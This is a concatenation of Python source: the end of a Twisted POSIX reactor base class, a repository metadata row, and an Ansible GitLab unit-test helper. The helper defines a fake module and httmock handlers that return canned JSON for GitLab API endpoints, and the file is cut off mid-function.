        assert sslEnabled, "SSL support is not present"
        c = ssl.Connector(host, port, factory, contextFactory, timeout, bindAddress, self)
        c.connect()
        return c

    def listenSSL(self, port, factory, contextFactory, backlog=50, interface=''):
        """@see: twisted.internet.interfaces.IReactorSSL.listenSSL
        """
        assert sslEnabled, "SSL support is not present"
        p = ssl.Port(port, factory, contextFactory, backlog, interface, self)
        p.startListening()
        return p

    # IReactorArbitrary

    def listenWith(self, portType, *args, **kw):
        kw['reactor'] = self
        p = portType(*args, **kw)
        p.startListening()
        return p

    def connectWith(self, connectorType, *args, **kw):
        kw['reactor'] = self
        c = connectorType(*args, **kw)
        c.connect()
        return c

    def _removeAll(self, readers, writers):
        """
        Remove all readers and writers, and return list of Selectables.
        Meant for calling from subclasses, to implement removeAll, like::
            def removeAll(self):
                return self._removeAll(reads, writes)
        where C{reads} and C{writes} are iterables.
        """
        # The waker must stay registered or the reactor can no longer be
        # woken up, so it is excluded from removal.
        readers = [reader for reader in readers if
                   reader is not self.waker]
        readers_dict = {}
        for reader in readers:
            readers_dict[reader] = 1
        for reader in readers:
            self.removeReader(reader)
            self.removeWriter(reader)
        # Writers that were also readers were already removed above.
        writers = [writer for writer in writers if
                   writer not in readers_dict]
        for writer in writers:
            self.removeWriter(writer)
        return readers+writers
# Declare the optional reactor interfaces only when the corresponding
# support modules imported successfully at the top of the file.
if sslEnabled:
    classImplements(PosixReactorBase, IReactorSSL)
if unixEnabled:
    classImplements(PosixReactorBase, IReactorUNIX, IReactorUNIXDatagram)
if processEnabled:
    classImplements(PosixReactorBase, IReactorProcess)
__all__ = ["PosixReactorBase"]
| [
"bcwalrus@cloudera.com"
] | bcwalrus@cloudera.com |
4493d66c4308273818a2e1583c59b19d6f86fb1e | 26bd175ffb3bd204db5bcb70eec2e3dfd55fbe9f | /exercises/networking_selfpaced/networking-workshop/collections/ansible_collections/community/general/tests/unit/modules/source_control/gitlab/gitlab.py | 5a6bc0ea58a494099c0c7001e41e5d0c095d80c1 | [
"GPL-3.0-only",
"MIT",
"CC0-1.0",
"GPL-1.0-or-later"
] | permissive | tr3ck3r/linklight | 37814ed19173d893cdff161355d70a1cf538239b | 5060f624c235ecf46cb62cefcc6bddc6bf8ca3e7 | refs/heads/master | 2021-04-11T04:33:02.727318 | 2020-03-25T17:38:41 | 2020-03-25T17:38:41 | 248,992,437 | 0 | 0 | MIT | 2020-03-21T14:26:25 | 2020-03-21T14:26:25 | null | UTF-8 | Python | false | false | 30,288 | py | # -*- coding: utf-8 -*-
# Copyright: (c) 2019, Guillaume Martinez (lunik@tiwabbit.fr)
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import
import sys
from httmock import response # noqa
from httmock import urlmatch # noqa
from ansible_collections.community.general.tests.unit.compat import unittest
from gitlab import Gitlab
class FakeAnsibleModule(object):
    """Minimal stand-in for AnsibleModule used by the GitLab module tests.

    It exposes the check_mode flag the modules read and swallows the
    fail_json/exit_json calls (which would normally terminate the run).
    """

    def __init__(self):
        # Modules under test only ever read this flag.
        self.check_mode = False

    def fail_json(self, **args):
        # Ignore failure reports instead of exiting like the real module.
        pass

    def exit_json(self, **args):
        # Ignore success reports.
        pass
class GitlabModuleTestCase(unittest.TestCase):
    # Shared fixture for the GitLab module tests: a fake AnsibleModule plus a
    # python-gitlab client pointed at a dummy endpoint (HTTP is mocked with
    # httmock, so no real requests are made).
    def setUp(self):
        # Skip the whole test case on interpreters too old for python-gitlab.
        unitest_python_version_check_requirement(self)
        self.mock_module = FakeAnsibleModule()
        self.gitlab_instance = Gitlab("http://localhost", private_token="private_token", api_version=4)
# Python 2.7+ is needed for python-gitlab
GITLAB_MINIMUM_PYTHON_VERSION = (2, 7)
# Verify if the current Python version is higher than GITLAB_MINIMUM_PYTHON_VERSION
def python_version_match_requirement():
return sys.version_info >= GITLAB_MINIMUM_PYTHON_VERSION
# Skip unittest test case if python version don't match requirement
def unitest_python_version_check_requirement(unittest_testcase):
if not python_version_match_requirement():
unittest_testcase.skipTest("Python %s+ is needed for python-gitlab" % ",".join(map(str, GITLAB_MINIMUM_PYTHON_VERSION)))
'''
USER API
'''
@urlmatch(scheme="http", netloc="localhost", path="/api/v4/users", method="get")
def resp_find_user(url, request):
headers = {'content-type': 'application/json'}
content = ('[{"id": 1, "username": "john_smith", "name": "John Smith", "state": "active",'
'"avatar_url": "http://localhost:3000/uploads/user/avatar/1/cd8.jpeg",'
'"web_url": "http://localhost:3000/john_smith"}, {"id": 2,'
'"username": "jack_smith", "name": "Jack Smith", "state": "blocked",'
'"avatar_url": "http://gravatar.com/../e32131cd8.jpeg",'
'"web_url": "http://localhost:3000/jack_smith"}]')
content = content.encode("utf-8")
return response(200, content, headers, None, 5, request)
@urlmatch(scheme="http", netloc="localhost", path="/api/v4/users", method="post")
def resp_create_user(url, request):
headers = {'content-type': 'application/json'}
content = ('{"id": 1, "username": "john_smith", "name": "John Smith", "state": "active",'
'"avatar_url": "http://localhost:3000/uploads/user/avatar/1/cd8.jpeg",'
'"web_url": "http://localhost:3000/john_smith","created_at": "2012-05-23T08:00:58Z",'
'"bio": null, "location": null, "public_email": "john@example.com", "skype": "",'
'"linkedin": "", "twitter": "", "website_url": "", "organization": ""}')
content = content.encode("utf-8")
return response(201, content, headers, None, 5, request)
@urlmatch(scheme="http", netloc="localhost", path="/api/v4/users/1", method="get")
def resp_get_user(url, request):
    """Mock GET /api/v4/users/1: single user record (200)."""
    payload = ('{"id": 1, "username": "john_smith", "name": "John Smith",'
               '"state": "active",'
               '"avatar_url": "http://localhost:3000/uploads/user/avatar/1/cd8.jpeg",'
               '"web_url": "http://localhost:3000/john_smith",'
               '"created_at": "2012-05-23T08:00:58Z", "bio": null, "location": null,'
               '"public_email": "john@example.com", "skype": "", "linkedin": "",'
               '"twitter": "", "website_url": "", "organization": "", "is_admin": false}')
    return response(200, payload.encode("utf-8"), {"content-type": "application/json"}, None, 5, request)
@urlmatch(scheme="http", netloc="localhost", path="/api/v4/users/1", method="get")
def resp_get_missing_user(url, request):
    """Mock GET /api/v4/users/1 for a user that does not exist (404)."""
    return response(404, "{}".encode("utf-8"), {"content-type": "application/json"}, None, 5, request)
@urlmatch(scheme="http", netloc="localhost", path="/api/v4/users/1", method="delete")
def resp_delete_user(url, request):
    """Mock DELETE /api/v4/users/1: successful deletion (204)."""
    return response(204, "{}".encode("utf-8"), {"content-type": "application/json"}, None, 5, request)
@urlmatch(scheme="http", netloc="localhost", path="/api/v4/users/1", method="delete")
def resp_delete_missing_user(url, request):
    """Mock DELETE /api/v4/users/1 for a user that does not exist (404)."""
    return response(404, "{}".encode("utf-8"), {"content-type": "application/json"}, None, 5, request)
'''
USER SSHKEY API
'''
@urlmatch(scheme="http", netloc="localhost", path="/api/v4/users/1/keys", method="get")
def resp_get_user_keys(url, request):
    """Mock GET /api/v4/users/1/keys: list of the user's SSH keys (200)."""
    payload = ('[{"id": 1, "title": "Public key",'
               '"key": "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAIEAiPWx6WM4lhHNedGfBpPJNPpZ7yKu+dnn1SJejgt4596'
               'k6YjzGGphH2TUxwKzxcKDKKezwkpfnxPkSMkuEspGRt/aZZ9wa++Oi7Qkr8prgHc4soW6NUlfDzpvZK2H5E7eQa'
               'SeP3SAwGmQKUFHCddNaP0L+hM7zhFNzjFvpaMgJw0=",'
               '"created_at": "2014-08-01T14:47:39.080Z"},{"id": 3,'
               '"title": "Another Public key",'
               '"key": "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAIEAiPWx6WM4lhHNedGfBpPJNPpZ7yKu+dnn1SJejgt4596'
               'k6YjzGGphH2TUxwKzxcKDKKezwkpfnxPkSMkuEspGRt/aZZ9wa++Oi7Qkr8prgHc4soW6NUlfDzpvZK2H5E7eQaS'
               'eP3SAwGmQKUFHCddNaP0L+hM7zhFNzjFvpaMgJw0=",'
               '"created_at": "2014-08-01T14:47:39.080Z"}]')
    return response(200, payload.encode("utf-8"), {"content-type": "application/json"}, None, 5, request)
@urlmatch(scheme="http", netloc="localhost", path="/api/v4/users/1/keys", method="post")
def resp_create_user_keys(url, request):
    """Mock POST /api/v4/users/1/keys: newly added SSH key (201)."""
    payload = ('{"id": 1, "title": "Private key",'
               '"key": "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDA1YotVDm2mAyk2tPt4E7AHm01sS6JZmcUdRuSuA5z'
               'szUJzYPPUSRAX3BCgTqLqYx//UuVncK7YqLVSbbwjKR2Ez5lISgCnVfLVEXzwhv+xawxKWmI7hJ5S0tOv6MJ+Ixy'
               'Ta4xcKwJTwB86z22n9fVOQeJTR2dSOH1WJrf0PvRk+KVNY2jTiGHTi9AIjLnyD/jWRpOgtdfkLRc8EzAWrWlgNmH'
               '2WOKBw6za0az6XoG75obUdFVdW3qcD0xc809OHLi7FDf+E7U4wiZJCFuUizMeXyuK/SkaE1aee4Qp5R4dxTR4TP9'
               'M1XAYkf+kF0W9srZ+mhF069XD/zhUPJsvwEF",'
               '"created_at": "2014-08-01T14:47:39.080Z"}')
    return response(201, payload.encode("utf-8"), {"content-type": "application/json"}, None, 5, request)
'''
GROUP API
'''
@urlmatch(scheme="http", netloc="localhost", path="/api/v4/groups", method="get")
def resp_find_group(url, request):
    """Mock GET /api/v4/groups: list of two groups (200)."""
    payload = ('[{"id": 1, "name": "Foobar Group", "path": "foo-bar",'
               '"description": "An interesting group", "visibility": "public",'
               '"lfs_enabled": true, "avatar_url": "http://localhost:3000/uploads/group/avatar/1/foo.jpg",'
               '"web_url": "http://localhost:3000/groups/foo-bar", "request_access_enabled": false,'
               '"full_name": "Foobar Group", "full_path": "foo-bar",'
               '"file_template_project_id": 1, "parent_id": null, "projects": []}, {"id": 2, "name": "BarFoo Group", "path": "bar-foor",'
               '"description": "An interesting group", "visibility": "public",'
               '"lfs_enabled": true, "avatar_url": "http://localhost:3000/uploads/group/avatar/2/bar.jpg",'
               '"web_url": "http://localhost:3000/groups/bar-foo", "request_access_enabled": false,'
               '"full_name": "BarFoo Group", "full_path": "bar-foo",'
               '"file_template_project_id": 1, "parent_id": null, "projects": []}]')
    return response(200, payload.encode("utf-8"), {"content-type": "application/json"}, None, 5, request)
@urlmatch(scheme="http", netloc="localhost", path="/api/v4/groups/1", method="get")
def resp_get_group(url, request):
    """Mock GET /api/v4/groups/1: group record including its projects (200)."""
    payload = ('{"id": 1, "name": "Foobar Group", "path": "foo-bar",'
               '"description": "An interesting group", "visibility": "public",'
               '"lfs_enabled": true, "avatar_url": "http://localhost:3000/uploads/group/avatar/1/foo.jpg",'
               '"web_url": "http://localhost:3000/groups/foo-bar", "request_access_enabled": false,'
               '"full_name": "Foobar Group", "full_path": "foo-bar",'
               '"file_template_project_id": 1, "parent_id": null, "projects": [{"id": 1,"description": null, "default_branch": "master",'
               '"ssh_url_to_repo": "git@example.com:diaspora/diaspora-client.git",'
               '"http_url_to_repo": "http://example.com/diaspora/diaspora-client.git",'
               '"web_url": "http://example.com/diaspora/diaspora-client",'
               '"readme_url": "http://example.com/diaspora/diaspora-client/blob/master/README.md",'
               '"tag_list": ["example","disapora client"],"name": "Diaspora Client",'
               '"name_with_namespace": "Diaspora / Diaspora Client","path": "diaspora-client",'
               '"path_with_namespace": "diaspora/diaspora-client","created_at": "2013-09-30T13:46:02Z",'
               '"last_activity_at": "2013-09-30T13:46:02Z","forks_count": 0,'
               '"avatar_url": "http://example.com/uploads/project/avatar/4/uploads/avatar.png",'
               '"star_count": 0}]}')
    return response(200, payload.encode("utf-8"), {"content-type": "application/json"}, None, 5, request)
@urlmatch(scheme="http", netloc="localhost", path="/api/v4/groups/1", method="get")
def resp_get_missing_group(url, request):
    """Mock GET /api/v4/groups/1 for a group that does not exist (404)."""
    return response(404, "{}".encode("utf-8"), {"content-type": "application/json"}, None, 5, request)
@urlmatch(scheme="http", netloc="localhost", path="/api/v4/groups", method="post")
def resp_create_group(url, request):
    """Mock POST /api/v4/groups: newly created top-level group (200)."""
    payload = ('{"id": 1, "name": "Foobar Group", "path": "foo-bar",'
               '"description": "An interesting group", "visibility": "public",'
               '"lfs_enabled": true, "avatar_url": "http://localhost:3000/uploads/group/avatar/1/foo.jpg",'
               '"web_url": "http://localhost:3000/groups/foo-bar", "request_access_enabled": false,'
               '"full_name": "Foobar Group", "full_path": "foo-bar",'
               '"file_template_project_id": 1, "parent_id": null}')
    return response(200, payload.encode("utf-8"), {"content-type": "application/json"}, None, 5, request)
@urlmatch(scheme="http", netloc="localhost", path="/api/v4/groups", method="post")
def resp_create_subgroup(url, request):
    """Mock POST /api/v4/groups: newly created subgroup of group 1 (200)."""
    payload = ('{"id": 2, "name": "BarFoo Group", "path": "bar-foor",'
               '"description": "An interesting group", "visibility": "public",'
               '"lfs_enabled": true, "avatar_url": "http://localhost:3000/uploads/group/avatar/2/bar.jpg",'
               '"web_url": "http://localhost:3000/groups/foo-bar/bar-foo", "request_access_enabled": false,'
               '"full_name": "BarFoo Group", "full_path": "foo-bar/bar-foo",'
               '"file_template_project_id": 1, "parent_id": 1}')
    return response(200, payload.encode("utf-8"), {"content-type": "application/json"}, None, 5, request)
@urlmatch(scheme="http", netloc="localhost", path="/api/v4/groups/1", method="delete")
def resp_delete_group(url, request):
    """Mock DELETE /api/v4/groups/1: successful group deletion (204).

    Bugfix: this mock previously matched the user endpoint
    ("/api/v4/users/1"), a copy-paste error from resp_delete_user, so
    group-deletion requests were never intercepted by it.
    """
    headers = {'content-type': 'application/json'}
    content = ('{}')
    content = content.encode("utf-8")
    return response(204, content, headers, None, 5, request)
'''
GROUP MEMBER API
'''
@urlmatch(scheme="http", netloc="localhost", path="/api/v4/groups/1/members/1", method="get")
def resp_get_member(url, request):
    """Mock GET /api/v4/groups/1/members/1: single group member (200)."""
    payload = ('{"id": 1, "username": "raymond_smith", "name": "Raymond Smith", "state": "active",'
               '"avatar_url": "https://www.gravatar.com/avatar/c2525a7f58ae3776070e44c106c48e15?s=80&d=identicon",'
               '"web_url": "http://192.168.1.8:3000/root", "expires_at": "2012-10-22T14:13:35Z", "access_level": 30}')
    return response(200, payload.encode("utf-8"), {"content-type": "application/json"}, None, 5, request)
@urlmatch(scheme="http", netloc="localhost", path="/api/v4/groups/1/members", method="get")
def resp_find_member(url, request):
    """Mock GET /api/v4/groups/1/members: list of two group members (200)."""
    payload = ('[{"id": 1, "username": "raymond_smith", "name": "Raymond Smith", "state": "active",'
               '"avatar_url": "https://www.gravatar.com/avatar/c2525a7f58ae3776070e44c106c48e15?s=80&d=identicon",'
               '"web_url": "http://192.168.1.8:3000/root", "expires_at": "2012-10-22T14:13:35Z", "access_level": 30},{'
               '"id": 2, "username": "john_doe", "name": "John Doe","state": "active",'
               '"avatar_url": "https://www.gravatar.com/avatar/c2525a7f58ae3776070e44c106c48e15?s=80&d=identicon",'
               '"web_url": "http://192.168.1.8:3000/root","expires_at": "2012-10-22T14:13:35Z",'
               '"access_level": 30}]')
    return response(200, payload.encode("utf-8"), {"content-type": "application/json"}, None, 5, request)
@urlmatch(scheme="http", netloc="localhost", path="/api/v4/groups/1/members", method="post")
def resp_add_member(url, request):
    """Mock POST /api/v4/groups/1/members: member added with access level 30 (200)."""
    payload = ('{"id": 1, "username": "raymond_smith", "name": "Raymond Smith",'
               '"state": "active",'
               '"avatar_url": "https://www.gravatar.com/avatar/c2525a7f58ae3776070e44c106c48e15?s=80&d=identicon",'
               '"web_url": "http://192.168.1.8:3000/root", "expires_at": "2012-10-22T14:13:35Z",'
               '"access_level": 30}')
    return response(200, payload.encode("utf-8"), {"content-type": "application/json"}, None, 5, request)
@urlmatch(scheme="http", netloc="localhost", path="/api/v4/groups/1/members/1", method="put")
def resp_update_member(url, request):
    """Mock PUT /api/v4/groups/1/members/1: member updated to access level 10 (200)."""
    payload = ('{"id": 1, "username": "raymond_smith", "name": "Raymond Smith",'
               '"state": "active",'
               '"avatar_url": "https://www.gravatar.com/avatar/c2525a7f58ae3776070e44c106c48e15?s=80&d=identicon",'
               '"web_url": "http://192.168.1.8:3000/root", "expires_at": "2012-10-22T14:13:35Z",'
               '"access_level": 10}')
    return response(200, payload.encode("utf-8"), {"content-type": "application/json"}, None, 5, request)
'''
DEPLOY KEY API
'''
@urlmatch(scheme="http", netloc="localhost", path="/api/v4/projects/1/deploy_keys", method="get")
def resp_find_project_deploy_key(url, request):
    """Mock GET /api/v4/projects/1/deploy_keys: list of two deploy keys (200)."""
    payload = ('[{"id": 1,"title": "Public key",'
               '"key": "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAIEAiPWx6WM4lhHNedGfBpPJNPpZ7yKu+dnn1SJejgt4596k6YjzGGphH2TUxwKzxc'
               'KDKKezwkpfnxPkSMkuEspGRt/aZZ9wa++Oi7Qkr8prgHc4soW6NUlfDzpvZK2H5E7eQaSeP3SAwGmQKUFHCddNaP0L+hM7zhFNzjFvpaMgJw0=",'
               '"created_at": "2013-10-02T10:12:29Z"},{"id": 3,"title": "Another Public key",'
               '"key": "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAIEAiPWx6WM4lhHNedGfBpPJNPpZ7yKu+dnn1SJejgt4596k6YjzGGphH2TUxwKzxc'
               'KDKKezwkpfnxPkSMkuEspGRt/aZZ9wa++Oi7Qkr8prgHc4soW6NUlfDzpvZK2H5E7eQaSeP3SAwGmQKUFHCddNaP0L+hM7zhFNzjFvpaMgJw0=",'
               '"created_at": "2013-10-02T11:12:29Z"}]')
    return response(200, payload.encode("utf-8"), {"content-type": "application/json"}, None, 5, request)
@urlmatch(scheme="http", netloc="localhost", path="/api/v4/projects/1/deploy_keys/1", method="get")
def resp_get_project_deploy_key(url, request):
    """Mock GET /api/v4/projects/1/deploy_keys/1: single deploy key (200)."""
    payload = ('{"id": 1,"title": "Public key",'
               '"key": "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAIEAiPWx6WM4lhHNedGfBpPJNPpZ7yKu+dnn1SJejgt4596k6YjzGGphH2TUxwKzxc'
               'KDKKezwkpfnxPkSMkuEspGRt/aZZ9wa++Oi7Qkr8prgHc4soW6NUlfDzpvZK2H5E7eQaSeP3SAwGmQKUFHCddNaP0L+hM7zhFNzjFvpaMgJw0=",'
               '"created_at": "2013-10-02T10:12:29Z"}')
    return response(200, payload.encode("utf-8"), {"content-type": "application/json"}, None, 5, request)
@urlmatch(scheme="http", netloc="localhost", path="/api/v4/projects/1/deploy_keys", method="post")
def resp_create_project_deploy_key(url, request):
    """Mock POST /api/v4/projects/1/deploy_keys: newly created deploy key (201)."""
    payload = ('{"id": 1,"title": "Public key",'
               '"key": "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAIEAiPWx6WM4lhHNedGfBpPJNPpZ7yKu+dnn1SJejgt4596k6YjzGGphH2TUxwKzxc'
               'KDKKezwkpfnxPkSMkuEspGRt/aZZ9wa++Oi7Qkr8prgHc4soW6NUlfDzpvZK2H5E7eQaSeP3SAwGmQKUFHCddNaP0L+hM7zhFNzjFvpaMgJw0=",'
               '"created_at": "2013-10-02T10:12:29Z"}')
    return response(201, payload.encode("utf-8"), {"content-type": "application/json"}, None, 5, request)
@urlmatch(scheme="http", netloc="localhost", path="/api/v4/projects/1/deploy_keys/1", method="delete")
def resp_delete_project_deploy_key(url, request):
    """Mock DELETE /api/v4/projects/1/deploy_keys/1: successful deletion (204)."""
    return response(204, "{}".encode("utf-8"), {"content-type": "application/json"}, None, 5, request)
'''
PROJECT API
'''
@urlmatch(scheme="http", netloc="localhost", path="/api/v4/projects", method="get")
def resp_find_project(url, request):
    """Mock GET /api/v4/projects: list containing one project (200)."""
    payload = ('[{"id": 1,"description": null, "default_branch": "master",'
               '"ssh_url_to_repo": "git@example.com:diaspora/diaspora-client.git",'
               '"http_url_to_repo": "http://example.com/diaspora/diaspora-client.git",'
               '"web_url": "http://example.com/diaspora/diaspora-client",'
               '"readme_url": "http://example.com/diaspora/diaspora-client/blob/master/README.md",'
               '"tag_list": ["example","disapora client"],"name": "Diaspora Client",'
               '"name_with_namespace": "Diaspora / Diaspora Client","path": "diaspora-client",'
               '"path_with_namespace": "diaspora/diaspora-client","created_at": "2013-09-30T13:46:02Z",'
               '"last_activity_at": "2013-09-30T13:46:02Z","forks_count": 0,'
               '"avatar_url": "http://example.com/uploads/project/avatar/4/uploads/avatar.png",'
               '"star_count": 0}]')
    return response(200, payload.encode("utf-8"), {"content-type": "application/json"}, None, 5, request)
@urlmatch(scheme="http", netloc="localhost", path="/api/v4/projects/1", method="get")
def resp_get_project(url, request):
    """Mock GET /api/v4/projects/1: single project record (200)."""
    payload = ('{"id": 1,"description": null, "default_branch": "master",'
               '"ssh_url_to_repo": "git@example.com:diaspora/diaspora-client.git",'
               '"http_url_to_repo": "http://example.com/diaspora/diaspora-client.git",'
               '"web_url": "http://example.com/diaspora/diaspora-client",'
               '"readme_url": "http://example.com/diaspora/diaspora-client/blob/master/README.md",'
               '"tag_list": ["example","disapora client"],"name": "Diaspora Client",'
               '"name_with_namespace": "Diaspora / Diaspora Client","path": "diaspora-client",'
               '"path_with_namespace": "diaspora/diaspora-client","created_at": "2013-09-30T13:46:02Z",'
               '"last_activity_at": "2013-09-30T13:46:02Z","forks_count": 0,'
               '"avatar_url": "http://example.com/uploads/project/avatar/4/uploads/avatar.png",'
               '"star_count": 0}')
    return response(200, payload.encode("utf-8"), {"content-type": "application/json"}, None, 5, request)
@urlmatch(scheme="http", netloc="localhost", path="/api/v4/projects/foo-bar%2Fdiaspora-client", method="get")
def resp_get_project_by_name(url, request):
    """Mock GET /api/v4/projects/<url-encoded path>: project looked up by name (200)."""
    payload = ('{"id": 1,"description": null, "default_branch": "master",'
               '"ssh_url_to_repo": "git@example.com:diaspora/diaspora-client.git",'
               '"http_url_to_repo": "http://example.com/diaspora/diaspora-client.git",'
               '"web_url": "http://example.com/diaspora/diaspora-client",'
               '"readme_url": "http://example.com/diaspora/diaspora-client/blob/master/README.md",'
               '"tag_list": ["example","disapora client"],"name": "Diaspora Client",'
               '"name_with_namespace": "Diaspora / Diaspora Client","path": "diaspora-client",'
               '"path_with_namespace": "diaspora/diaspora-client","created_at": "2013-09-30T13:46:02Z",'
               '"last_activity_at": "2013-09-30T13:46:02Z","forks_count": 0,'
               '"avatar_url": "http://example.com/uploads/project/avatar/4/uploads/avatar.png",'
               '"star_count": 0}')
    return response(200, payload.encode("utf-8"), {"content-type": "application/json"}, None, 5, request)
@urlmatch(scheme="http", netloc="localhost", path="/api/v4/groups/1/projects", method="get")
def resp_find_group_project(url, request):
    """Mock GET /api/v4/groups/1/projects: list containing one group project (200)."""
    payload = ('[{"id": 1,"description": null, "default_branch": "master",'
               '"ssh_url_to_repo": "git@example.com:diaspora/diaspora-client.git",'
               '"http_url_to_repo": "http://example.com/diaspora/diaspora-client.git",'
               '"web_url": "http://example.com/diaspora/diaspora-client",'
               '"readme_url": "http://example.com/diaspora/diaspora-client/blob/master/README.md",'
               '"tag_list": ["example","disapora client"],"name": "Diaspora Client",'
               '"name_with_namespace": "Diaspora / Diaspora Client","path": "diaspora-client",'
               '"path_with_namespace": "diaspora/diaspora-client","created_at": "2013-09-30T13:46:02Z",'
               '"last_activity_at": "2013-09-30T13:46:02Z","forks_count": 0,'
               '"avatar_url": "http://example.com/uploads/project/avatar/4/uploads/avatar.png",'
               '"star_count": 0}]')
    return response(200, payload.encode("utf-8"), {"content-type": "application/json"}, None, 5, request)
@urlmatch(scheme="http", netloc="localhost", path="/api/v4/groups/1/projects/1", method="get")
def resp_get_group_project(url, request):
    """Mock GET /api/v4/groups/1/projects/1: single group project (200)."""
    payload = ('{"id": 1,"description": null, "default_branch": "master",'
               '"ssh_url_to_repo": "git@example.com:diaspora/diaspora-client.git",'
               '"http_url_to_repo": "http://example.com/diaspora/diaspora-client.git",'
               '"web_url": "http://example.com/diaspora/diaspora-client",'
               '"readme_url": "http://example.com/diaspora/diaspora-client/blob/master/README.md",'
               '"tag_list": ["example","disapora client"],"name": "Diaspora Client",'
               '"name_with_namespace": "Diaspora / Diaspora Client","path": "diaspora-client",'
               '"path_with_namespace": "diaspora/diaspora-client","created_at": "2013-09-30T13:46:02Z",'
               '"last_activity_at": "2013-09-30T13:46:02Z","forks_count": 0,'
               '"avatar_url": "http://example.com/uploads/project/avatar/4/uploads/avatar.png",'
               '"star_count": 0}')
    return response(200, payload.encode("utf-8"), {"content-type": "application/json"}, None, 5, request)
@urlmatch(scheme="http", netloc="localhost", path="/api/v4/projects", method="post")
def resp_create_project(url, request):
    """Mock POST /api/v4/projects: newly created project (201)."""
    payload = ('{"id": 1,"description": null, "default_branch": "master",'
               '"ssh_url_to_repo": "git@example.com:diaspora/diaspora-client.git",'
               '"http_url_to_repo": "http://example.com/diaspora/diaspora-client.git",'
               '"web_url": "http://example.com/diaspora/diaspora-client",'
               '"readme_url": "http://example.com/diaspora/diaspora-client/blob/master/README.md",'
               '"tag_list": ["example","disapora client"],"name": "Diaspora Client",'
               '"name_with_namespace": "Diaspora / Diaspora Client","path": "diaspora-client",'
               '"path_with_namespace": "diaspora/diaspora-client","created_at": "2013-09-30T13:46:02Z",'
               '"last_activity_at": "2013-09-30T13:46:02Z","forks_count": 0,'
               '"avatar_url": "http://example.com/uploads/project/avatar/4/uploads/avatar.png",'
               '"star_count": 0}')
    return response(201, payload.encode("utf-8"), {"content-type": "application/json"}, None, 5, request)
@urlmatch(scheme="http", netloc="localhost", path="/api/v4/projects/1", method="delete")
def resp_delete_project(url, request):
    """Mock DELETE /api/v4/projects/1: successful deletion (204)."""
    return response(204, "{}".encode("utf-8"), {"content-type": "application/json"}, None, 5, request)
'''
HOOK API
'''
@urlmatch(scheme="http", netloc="localhost", path="/api/v4/projects/1/hooks", method="get")
def resp_find_project_hook(url, request):
    """Mock GET /api/v4/projects/1/hooks: list containing one webhook (200)."""
    payload = ('[{"id": 1,"url": "http://example.com/hook","project_id": 3,'
               '"push_events": true,"push_events_branch_filter": "","issues_events": true,'
               '"confidential_issues_events": true,"merge_requests_events": true,'
               '"tag_push_events": true,"note_events": true,"job_events": true,'
               '"pipeline_events": true,"wiki_page_events": true,"enable_ssl_verification": true,'
               '"created_at": "2012-10-12T17:04:47Z"}]')
    return response(200, payload.encode("utf-8"), {"content-type": "application/json"}, None, 5, request)
@urlmatch(scheme="http", netloc="localhost", path="/api/v4/projects/1/hooks/1", method="get")
def resp_get_project_hook(url, request):
    """Mock GET /api/v4/projects/1/hooks/1: single webhook (200)."""
    payload = ('{"id": 1,"url": "http://example.com/hook","project_id": 3,'
               '"push_events": true,"push_events_branch_filter": "","issues_events": true,'
               '"confidential_issues_events": true,"merge_requests_events": true,'
               '"tag_push_events": true,"note_events": true,"job_events": true,'
               '"pipeline_events": true,"wiki_page_events": true,"enable_ssl_verification": true,'
               '"created_at": "2012-10-12T17:04:47Z"}')
    return response(200, payload.encode("utf-8"), {"content-type": "application/json"}, None, 5, request)
@urlmatch(scheme="http", netloc="localhost", path="/api/v4/projects/1/hooks", method="post")
def resp_create_project_hook(url, request):
    """Mock POST /api/v4/projects/1/hooks: newly created webhook (201)."""
    payload = ('{"id": 1,"url": "http://example.com/hook","project_id": 3,'
               '"push_events": true,"push_events_branch_filter": "","issues_events": true,'
               '"confidential_issues_events": true,"merge_requests_events": true,'
               '"tag_push_events": true,"note_events": true,"job_events": true,'
               '"pipeline_events": true,"wiki_page_events": true,"enable_ssl_verification": true,'
               '"created_at": "2012-10-12T17:04:47Z"}')
    return response(201, payload.encode("utf-8"), {"content-type": "application/json"}, None, 5, request)
@urlmatch(scheme="http", netloc="localhost", path="/api/v4/projects/1/hooks/1", method="delete")
def resp_delete_project_hook(url, request):
    """Mock DELETE /api/v4/projects/1/hooks/1: successful deletion (204)."""
    return response(204, "{}".encode("utf-8"), {"content-type": "application/json"}, None, 5, request)
'''
RUNNER API
'''
@urlmatch(scheme="http", netloc="localhost", path="/api/v4/runners/all", method="get")
def resp_find_runners_all(url, request):
    """Mock GET /api/v4/runners/all: list of two runners (200)."""
    payload = ('[{"active": true,"description": "test-1-20150125","id": 1,'
               '"is_shared": false,"ip_address": "127.0.0.1","name": null,'
               '"online": true,"status": "online"},{"active": true,'
               '"description": "test-2-20150125","id": 2,"ip_address": "127.0.0.1",'
               '"is_shared": false,"name": null,"online": false,"status": "offline"}]')
    return response(200, payload.encode("utf-8"), {"content-type": "application/json"}, None, 5, request)
@urlmatch(scheme="http", netloc="localhost", path="/api/v4/runners", method="get")
def resp_find_runners_list(url, request):
    """Mock GET /api/v4/runners: runner list (200) plus GitLab pagination headers."""
    pagination_headers = {
        "content-type": "application/json",
        "X-Page": 1,
        "X-Next-Page": 2,
        "X-Per-Page": 1,
        "X-Total-Pages": 1,
        "X-Total": 2,
    }
    payload = ('[{"active": true,"description": "test-1-20150125","id": 1,'
               '"is_shared": false,"ip_address": "127.0.0.1","name": null,'
               '"online": true,"status": "online"},{"active": true,'
               '"description": "test-2-20150125","id": 2,"ip_address": "127.0.0.1",'
               '"is_shared": false,"name": null,"online": false,"status": "offline"}]')
    return response(200, payload.encode("utf-8"), pagination_headers, None, 5, request)
@urlmatch(scheme="http", netloc="localhost", path="/api/v4/runners/1", method="get")
def resp_get_runner(url, request):
    """Mock GET /api/v4/runners/1: single runner record (200)."""
    payload = ('{"active": true,"description": "test-1-20150125","id": 1,'
               '"is_shared": false,"ip_address": "127.0.0.1","name": null,'
               '"online": true,"status": "online"}')
    return response(200, payload.encode("utf-8"), {"content-type": "application/json"}, None, 5, request)
@urlmatch(scheme="http", netloc="localhost", path="/api/v4/runners", method="post")
def resp_create_runner(url, request):
    """Mock POST /api/v4/runners: newly registered runner (201)."""
